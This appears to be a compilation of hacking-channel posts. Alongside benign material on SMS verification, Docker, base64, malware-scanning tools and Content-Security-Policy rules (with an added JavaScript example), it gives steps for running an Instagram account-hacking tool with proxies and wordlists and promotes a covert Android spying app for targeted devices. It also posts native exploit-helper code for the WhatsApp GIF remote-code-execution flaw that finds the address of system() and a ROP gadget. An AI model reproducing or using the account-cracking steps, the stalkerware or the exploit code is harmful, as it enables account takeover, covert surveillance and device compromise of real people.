UNDERCODE COMMUNITY

🦑 So is the SMS verification code really safe?

1) Nothing is completely safe, and an SMS verification code is not the safest way to verify your identity. Identity verification through SMS has grown so quickly within a few years because it is the lowest-cost, easiest and most convenient method of secondary verification.

2) Another reason is that mobile phones are so widespread that this method is the easiest for users to adopt and accept, and the security level of SMS verification is relatively high.

3) Relatively speaking, the security of secondary identity verification by SMS is fairly high. However, with the popularity of smartphones, vulnerabilities in mobile phone systems are also increasing, and the existence of various Trojan horses has created security problems for identity verification by SMS. At present it is still a relatively safe verification method.

🦑 What kind of threats is mobile SMS verification facing? What is the response?

1) In the era of smartphones, the biggest threat to SMS verification comes from SMS Trojans on smartphone platforms. This type of Trojan is spread through SMS messages containing short links, which get users to download and install the Trojan without their knowledge. Once the Trojan is installed on the phone, it resets the passwords of the user's property-related application accounts and intercepts the SMS verification codes, resetting the user's account.

2) This is a threat to the user's SMS verification security, and because such Trojans are simple to write, they have already formed a very complete industry chain: make Trojans → sell Trojans → rent Trojans → conduct phishing scams → wash the account after success → transfer of property. This is a huge underground industry chain, and because it has spawned a series of related industries,

3) I won't say much here. Of course, smartphone platforms have also issued corresponding policies to reduce the incidence of such thefts. For example, the Android system tightened the permissions for SMS after version 4.4, but most of them still rely on users to increase their vigilance to prevent

don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity

🦑 Docker for beginners:

Docker is the world's leading software containerization platform. For different types of penetration testing, we can use Docker to create corresponding environments. With Docker containers, you can put the test environment on a USB flash drive or in the cloud.

» What is Docker

1) Docker is an open source technology. In software containers, you can create, run, test, and deploy applications. Docker allows you to deploy applications quickly, reliably, and stably in any environment.

2) Containers have the advantages of being portable, convenient and fast. Using Docker, we can create an image and then build other environments on top of it. For example, suppose we downloaded Kali Linux as a base container, but it does not include the tools we need. We treat it as a base container, install the required tools on it, and then save it as a new image without affecting the original image.

3) In other words, based on the original image, a container containing forensic tools and Web penetration testing tools can be created.

🦑 Tools for web penetration testing

W3af-console

SQLMap

Arachni

Nikto

Websploit

Nmap

🦑 About installation

How Docker is installed depends on the operating system you are using, but installation packages for most systems are now available in the official repositories.

In this example we use openSUSE.

_0x4a0x72@pwned ~ sudo zypper se docker

S | Nome   | Resumo                      | Tipo
--+--------+-----------------------------+-------
  | docker | The Linux container runtime | pacote

_0x4a0x72@pwned ~ sudo zypper in docker

After the installation is successful, you must enable and start the service

_0x4a0x72@pwned ~ sudo systemctl enable docker

_0x4a0x72@pwned ~ sudo systemctl start docker

_0x4a0x72@pwned ~ sudo docker info


🦑 Base64 Encode and Decode From Command Line:

How do you use the base64 command to encode and decode the data in a string or a file?

We performed the commands in this example on an Ubuntu 20.04 Focal Fossa system. However, you can also run the same commands on other Linux distributions. To run the commands, we used the command-line Terminal application, which can be opened with the Ctrl+Alt+T keyboard shortcut.

A) Base64 Syntax

Here is the syntax for encoding using Base64:

base64 [OPTION] [FILE]

Options
Some of the command-line options that can be used with the base64 command are:

-d or --decode
Use this option to decode a file or a string.

--help
Use this option to display help regarding the usage of base64.

-i, --ignore-garbage
Use this option while decoding to ignore non-alphabet characters.

--version
Use this option to display version information.


B) Encoding String
You can easily encode a string using the base64 command. For instance, to encode the sample text "Welcome to Linux" to base64, the command would be:

$ echo "Welcome to Linux" | base64

1) This command will encode the text in the string using base64 and print the encoded text to standard output.

2) You can also save the encoded output to a file rather than printing it to standard output by using the redirection operator (>). The following command will encode the text and save the output to a file named "encodedfile.txt":

$ echo "Welcome to Linux" | base64 > encodedfile.txt

3) To view the encoded file, you can use the cat command:

$ cat encodedfile.txt

C) Decoding String

1) You can also decode base64 encoded text using the --decode or -d option. For instance, to decode the base64 encoded text "V2VsY29tZSB0byBMaW51eAo=", the command would be:

$ echo "V2VsY29tZSB0byBMaW51eAo=" | base64 --decode

2) This command will decode the base64 encoded text and print the original text to standard output.

3) You can also save the decoded output to a file rather than printing it to standard output by using the redirection operator (>). The following command will decode the encoded text and save the original text to a file named "decodedfile.txt":

$ echo "V2VsY29tZSB0byBMaW51eAo=" | base64 --decode > decodedfile.txt

D) Encoding Text File
The base64 command can also be used to encode a text file. For instance, to encode a text file named "testfile.txt", the command would be:

$ base64 testfile.txt

unix forum

🦑 Hack instagram via linux:

LET'S START:

1) git clone https://github.com/Ethical-H4CK3R/Instagram.git

this command will clone the entire program/script to your computer.

2) and now you need to chmod the file and open (go to) the directory of the program.
Type

> chmod -R 755 Instagram && cd Instagram

3) Now that we cloned the program/script, we now need to open the program.

> Type :

"ls"
to see what is inside the folder.

4) Now, as we know that there are three things inside the program/script folder, "Core", "README.md" and "instagram.py".

5) The executable program here is "instagram.py".
We need to execute the program. So type:

python instagram.py

6) For setup proxies https://www.serverlab.ca/tutorials/linux/administration-linux/how-to-configure-proxy-on-ubuntu-18-04/

7) For setting up a wordlist:
https://www.youtube.com/watch?v=GUNA0THt4a4

🦑 FREE ANDROID SPYING APPLICATION:

Remote access to the complete database of the targeted device with full invisibility on targeted devices.

Remote access the LIVE SCREEN SHARING OF TARGETED DEVICE

Remotely access to WEB HISTORY(in processing)

Remotely MONITORING MULTIPLE DEVICES AT A TIME WITH
BETTER CONSOLE

REALTIME WEB CONSOLE FOR MONITORING AND CONTROLLING

BETTER UX/UI DESIGN EXPERIENCE


» https://github.com/ranaaditya/SPYZIER-APP
(open source)

🦑 Create your own antivirus-malware detection tools & tutorials:

* [File Scanning Framework](https://github.com/EmersonElectricCo/fsf) -
Modular, recursive file scanning solution.

* [Generic File Parser](https://github.com/uppusaikiran/generic-parser) - A single library parser to extract meta information, perform static analysis and detect macros within files.

* [hashdeep](https://github.com/jessek/hashdeep) - Compute digest hashes with
a variety of algorithms.

* [HashCheck](https://github.com/gurnec/HashCheck) - Windows shell extension
to compute hashes with a variety of algorithms.

* [Loki](https://github.com/Neo23x0/Loki) - Host based scanner for IOCs.

* [Malfunction](https://github.com/Dynetics/Malfunction) - Catalog and
compare malware at a function level.

* [Manalyze](https://github.com/JusticeRage/Manalyze) - Static analyzer for PE
executables.

* [MASTIFF](https://github.com/KoreLogicSecurity/mastiff) - Static analysis
framework.

* [MultiScanner](https://github.com/mitre/multiscanner) - Modular file
scanning/analysis framework


git
WARNING! We have received many reports that some bad actors are using our profiles, names, pictures or logos to chat with people while impersonating us.

To chat with Undercode for support or help, DM the admins in the groups, or use our social media or emails only:

Support@UndercodeTesting.com
Support@UndercodeNews.com

Thank you.
Programming books

🦑 The real latest WhatsApp CVE:


Finally uploaded

# Exploit Title: Whatsapp 2.19.216 - Remote Code Execution
# Date: 2019-10-16
# Exploit Author: Valerio Brussani (@val_brux)
# Vendor Homepage: https://www.whatsapp.com/
# Version: < 2.19.244
# Tested on: Whatsapp 2.19.216
# CVE: CVE-2019-11932
# Reference1: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
# Full Android App: https://github.com/valbrux/CVE-2019-11932-SupportApp
# Credits: all credits for the bug discovery goes to Awakened (https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/)

/*
*
* Introduction
* This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened , by calculating the system() function address and ROP gadget address for different types of devices, which then can be used to successfully exploit the vulnerability.
* The full Android application code is available at the following link https://github.com/valbrux/CVE-2019-11932-SupportApp
*
*/

#include <jni.h>
#include <string>
#include <dlfcn.h>
#include <link.h>

typedef uint8_t byte;
char *gadget_p;
void* libc,* lib;

//dls iteration for rop
int dl_callback(struct dl_phdr_info *info, size_t size, void *data)
{
int j;
const char *base = (const char *)info->dlpi_addr;
for (j = 0; j < info->dlpi_phnum; j++) {
const ElfW(Phdr) *phdr = &info->dlpi_phdr[j];
if (phdr->p_type == PT_LOAD && (strcmp("/system/lib64/libhwui.so",info->dlpi_name) == 0)) {
gadget_p = (char *) base + phdr->p_vaddr;
return 1;
}
}
return 0;
}

//system address
void* get_system_address(){
libc = dlopen("libc.so",RTLD_GLOBAL);
void* address = dlsym( libc, "system");
return address;
}

//rop gadget address
void get_gadget_lib_base_address() {
lib = dlopen("libhwui.so",RTLD_GLOBAL);
dl_iterate_phdr(dl_callback, NULL);
}

//search gadget
long search_for_gadget_offset() {
char *buffer;
long filelen;
char curChar;
long pos = 0; int curSearch = 0;
//reading file
FILE* fd = fopen("/system/lib64/libhwui.so","rb");
fseek(fd, 0, SEEK_END);
filelen = ftell(fd);
rewind(fd);
buffer = (char *)malloc((filelen+1)*sizeof(char));
fread(buffer, filelen, 1, fd);
fclose(fd);
//searching for bytes
byte g1[12] = {0x68, 0x0E, 0x40, 0xF9, 0x60, 0x82, 0x00, 0x91, 0x00, 0x01, 0x3F, 0xD6};
while(pos <= filelen){
curChar = buffer[pos];pos++;
if(curChar == g1[curSearch]){
curSearch++;
if(curSearch > 11){
curSearch = 0;
pos-=12;
break;
}
}
else{
curSearch = 0;
}
}
return pos;
}

extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getSystem(JNIEnv* env,jobject) {
char buff[30];
//system address
snprintf(buff, sizeof(buff), "%p", get_system_address());
dlclose(libc);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}



extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getROPGadget(JNIEnv* env,jobject) {
char buff[30];
get_gadget_lib_base_address();
//gadget address
snprintf(buff, sizeof(buff), "%p",gadget_p+search_for_gadget_offset());
dlclose(lib);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}

🦑 New tip:
The Content-Security-Policy
1. How can I allow multiple sources?
You can simply list your sources after a directive as a space-separated list:
content="default-src 'self' https://example.com/js/"
Note that there are no quotes around parameters other than the special ones, like 'self'. Also, there's no colon (:) after the directive. Just the directive, then a space-separated list of parameters.
Everything below the specified parameters is implicitly allowed. That means that in the example above these would be valid sources:
https://example.com/js/file.js
https://example.com/js/subdir/anotherfile.js
These, however, would not be valid:
http://example.com/js/file.js
^^^^ wrong protocol

https://example.com/file.js
^^ above the specified path
2. How can I use different directives? What do they each do?
The most common directives are:
• default-src: the default policy for loading JavaScript, images, CSS, fonts, AJAX requests, etc.
• script-src: defines valid sources for JavaScript files
• style-src: defines valid sources for CSS files
• img-src: defines valid sources for images
• connect-src: defines valid targets for XMLHttpRequest (AJAX), WebSockets or EventSource. If a connection attempt is made to a host that's not allowed here, the browser will emulate a 400 error
There are others, but these are the ones you're most likely to need.
3. How can I use multiple directives?
You define all your directives inside one meta-tag by terminating them with a semicolon (;):
content="default-src 'self' https://example.com/js/; style-src 'self'"
4. How can I handle ports?
Everything but the default ports needs to be allowed explicitly by adding the port number or an asterisk after the allowed domain:
content="default-src 'self' https://ajax.googleapis.com http://example.com:123/free/stuff/"
The above would result in:
https://ajax.googleapis.com:123
^^^^ Not ok, wrong port

https://ajax.googleapis.com - OK

http://example.com/free/stuff/file.js
^^ Not ok, only the port 123 is allowed

http://example.com:123/free/stuff/file.js - OK
As I mentioned, you can also use an asterisk to explicitly allow all ports:
content="default-src example.com:*"
5. How can I handle different protocols?
By default, only standard protocols are allowed. For example to allow WebSockets ws:// you will have to allow it explicitly:
content="default-src 'self'; connect-src ws:; style-src 'self'"
^^^ web Sockets are now allowed on all domains and ports.
6. How can I allow the file protocol file://?
If you try to define it as such it won't work. Instead, you'll allow it with the filesystem parameter:
content="default-src filesystem"
7. How can I use inline scripts and style definitions?
Unless explicitly allowed, you can't use inline style definitions, code inside <script> tags or in tag properties like onclick. You allow them like so:
content="script-src 'unsafe-inline'; style-src 'unsafe-inline'"
You'll also have to explicitly allow inline, base64 encoded images:
content="img-src data:"
8. How can I allow eval()?
I'm sure many people would say that you don't, since 'eval is evil' and the most likely cause for the impending end of the world. Those people would be wrong. Sure, you can definitely punch major holes into your site's security with eval, but it has perfectly valid use cases. You just have to be smart about using it. You allow it like so:
content="script-src 'unsafe-eval'"
9. What exactly does 'self' mean?
You might take 'self' to mean localhost, local filesystem, or anything on the same host. It doesn't mean any of those. It means sources that have the same scheme (protocol), same host, and same port as the file the content policy is defined in. Serving your site over HTTP? No https for you then, unless you define it explicitly.

Unixforum
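
Added example (not part of the original post and not any browser's code): a simplified JavaScript model of the source-list rules above, covering directive parsing, fallback to default-src, and scheme, host, port and path matching. The origin https://mysite.example and all function names are assumptions; 'self' and schemes are compared exactly as the text describes, whereas current browsers also accept an https upgrade of an http source.

```javascript
// Added example: a simplified model of CSP source matching, not browser code.
// Host wildcards (*.example.com) and nonces/hashes are not modelled.
const DEFAULT_PORT = { 'http:': '80', 'https:': '443', 'ws:': '80', 'wss:': '443' };

// "default-src 'self'; img-src data:" -> { 'default-src': ["'self'"], 'img-src': ['data:'] }
function parsePolicy(policy) {
  const directives = {};
  for (const part of policy.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/);
    const key = name.toLowerCase();
    // When a directive is repeated, only its first occurrence counts.
    if (key && !(key in directives)) directives[key] = sources;
  }
  return directives;
}

function effectivePort(url) {
  return url.port || DEFAULT_PORT[url.protocol] || '';
}

// Does one source expression allow `url` for a page served from `selfOrigin`?
function sourceMatches(expr, url, selfOrigin) {
  const target = new URL(url);
  const self = new URL(selfOrigin);
  if (expr === "'self'") return target.origin === self.origin;
  if (expr.startsWith("'")) return false; // 'unsafe-inline' etc. never match a URL
  const schemeOnly = /^[a-z][a-z0-9+.-]*:$/i.exec(expr); // e.g. ws: or data:
  if (schemeOnly) return target.protocol === expr.toLowerCase();
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^\/:]+)(?::(\d+|\*))?(\/.*)?$/i.exec(expr);
  if (!m) return false;
  const [, scheme, host, port, path] = m;
  // A source without a scheme inherits the scheme of the protected page.
  const wantScheme = scheme ? scheme.toLowerCase() + ':' : self.protocol;
  if (target.protocol !== wantScheme) return false;
  if (target.hostname !== host.toLowerCase()) return false;
  if (port !== '*' && effectivePort(target) !== (port || DEFAULT_PORT[wantScheme])) return false;
  if (!path) return true; // no path: the whole origin is allowed
  // A path ending in "/" allows everything below it; otherwise exact match only.
  return path.endsWith('/') ? target.pathname.startsWith(path) : target.pathname === path;
}

// Fetch directives that are absent fall back to default-src.
function isAllowed(policy, directive, url, selfOrigin) {
  const directives = parsePolicy(policy);
  const sources = directives[directive] ?? directives['default-src'];
  if (sources === undefined) return true; // nothing applies: not restricted
  return sources.some((s) => sourceMatches(s, url, selfOrigin));
}

// Constructed check using the post's own port policy and one of its URLs.
const PORT_POLICY = "default-src 'self' https://ajax.googleapis.com http://example.com:123/free/stuff/";
console.log(isAllowed(PORT_POLICY, 'script-src', 'http://example.com/free/stuff/file.js', 'https://mysite.example'));
```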